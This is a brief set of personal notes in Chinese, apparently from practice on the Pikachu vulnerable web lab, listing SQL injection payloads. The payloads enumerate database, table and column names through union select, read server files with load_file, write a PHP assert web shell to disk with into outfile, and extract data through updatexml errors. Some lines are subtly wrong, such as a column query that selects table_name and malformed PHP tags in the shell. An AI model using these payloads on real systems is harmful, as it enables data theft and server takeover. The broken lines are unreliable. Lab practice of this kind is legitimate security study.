记录一些在使用 pikahcu 练习时用到的命令。

# SQL 注入

1. 获取数据库名
   

   1	# union select database ()

2. 获取表名
   

   1	# union select group_concat (table_name) from information_schema.tables where table_schema=database ()

3. 获取列名
   

   1	# union select group_concat (table_name) from information_schema.columns where table_name=' 表名 '

4. 读文件
   

   1	# union select load_file ('Path') from 表名

5. 写文件
   

   1	# union select '<!php assert ($_POST [1];?)>' into outfile 'Path'

6. 报错回显
   

   1	# and updatexml (1,concat (0x7e,(select database ()),0x7e),1))